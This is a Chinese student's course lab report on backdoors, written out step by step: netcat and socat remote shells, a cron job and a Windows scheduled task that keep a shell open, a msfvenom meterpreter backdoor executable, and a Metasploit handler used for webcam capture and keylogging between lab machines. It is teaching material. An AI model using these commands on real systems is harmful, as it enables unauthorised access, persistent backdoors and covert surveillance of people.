20154331黄芮EXP2 后门原理与实践

 EXP2 后门原理与实践

 

实践内容

使用netcat和socat、msf-meterpreter等工具获得主机权限,并进行一些恶意行为,如监控摄像头、记录键盘输入、截屏等。

 

实验过程

windows获得linux shell

1、在windows中的命令提示符下用ipconfig指令找到主机ip

.

 2、windows下使用C:\Users\Lenovo\Desktop\ncat\ncat.exe -l -p 4331命令运行ncat.exe监听4331端口.

3、kali下使用为nc 172.30.1.85(主机ip) 4331 -e /bin/sh命令连接windows的4331端口.

4、没有反应表示连接成功,之后我们就可以在windows下获取kali的信息:

linux获得windows的shell

1、kali下使用nc -l -p 4331命令监听4331端口。

 

2、利用ifconfig在kali中找到kali的IP地址:192.168.116.128

3、在windows下使用C:\Users\Lenovo\Desktop\ncat\ncat.exe -e cmd.exe 192.168.116.128(即kali的IP地址)连接kali的4331端口

4、连接成功后,我们就可以在kali主机获取windows的信息,此时已成功获取windows的shell

 
使用netcat传输数据

1、windows下使用C:\Users\Lenovo\Desktop\ncat\ncat.exe -l -p 4331命令运行ncat.exe监听4331端口.

2、kali下使用为nc 172.30.1.85(主机ip) 4331命令连接windows的4331端口。

3、建立连接后,两边就可以进行传输。

Windows下:

虚拟机下:

 

cron启动

1、windows下使用C:\Users\Lenovo\Desktop\ncat\ncat.exe -l -p 4331命令运行ncat.exe监听4331端口.

2、kali下使用crontab -e命令,设置一条定时指令,由于做的时候时间为19:13,所以我设置成在每小时的第17分钟反向连接windows主机的4331端口

输入指令 17* * * * /bin/netcat 172.30.1.85 4331 -e /bin/sh后按ctrl+x离开,并保存。

3、等到时间为17分钟的时候,在windows端用ls指令查看。

socat

socat获取主机操作Shell, 任务计划启动。

 

1、在windows下的控制面板--->管理工具--->任务计划程序中新建一个触发器,民称为20154331.

 

 

2、再新建一个操作,在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:4331 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口4331,同时把cmd.exe的stderr重定向到stdout上:

3、创建完成之后运行它。

4、然后在kali下使用指令socat - tcp:172.30.1.85(主机ip):4331(端口),这个时候就成功获取windows的shell。

msf-meterpreter

msf-meterpreter 生成后门,传输到靶机获取shell

1、在kali下输入命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.116.128 LPORT=4331 -f exe > 20154331.exe

    生成一个名为20154331的后门程序

2、使用netcat将这个后门程序传输到windows主机上。

首先我们在windows下输入ncat.exe -lv 4331 > 20154331.exe

随后在Linux下使用ncat -nv 172.30.1.85 4331 < 20154331.exe命令把文件传送过去

使用msf获取目标摄像头,进行录屏、键盘记录等操作

1、首先msf打开监听进程,msfconsole :进入msf

 

2、use exploit/multi/handler:进入handler模式

     set payload windows/meterpreter/reverse_tcp :设置payload

     set LHOST 192.168.116.128 :将LHOST设置为LinuxIP地址

     set LPORT 4331 :设端口为那个4331exploit //MSF开始监听

3、获取windows系统的具体信息:

4、使用webcam_snap指令可以使用摄像头进行拍照:

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

答:将后门程序捆绑在可执行程序中,或者捆绑在某个软件里。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

答:伪装成文件或常用软件,等待用户点击。

(3)Meterpreter有哪些给你映像深刻的功能?

答:可以打开摄像头和录音,挺可怕的。

(4)如何发现自己有系统有没有被安装后门?

答:查看电脑的开机项,检测是否有未知项,或者用杀毒软件扫。

实验心得:

       这是网络攻防的第二次实验。能够利用后门查看他人电脑信息,获取他人摄像头权限进行录拍,还有录音。突然发现网络并不安全,我觉得我们还是要时刻警惕自己的电脑以防入侵。虽然我们只学了几节课,但是还是觉得网络攻防不是那么简单的,还有很多值得我们去学习。

posted @ 2018-03-28 21:52  20154331黄芮  阅读(108)  评论(0编辑  收藏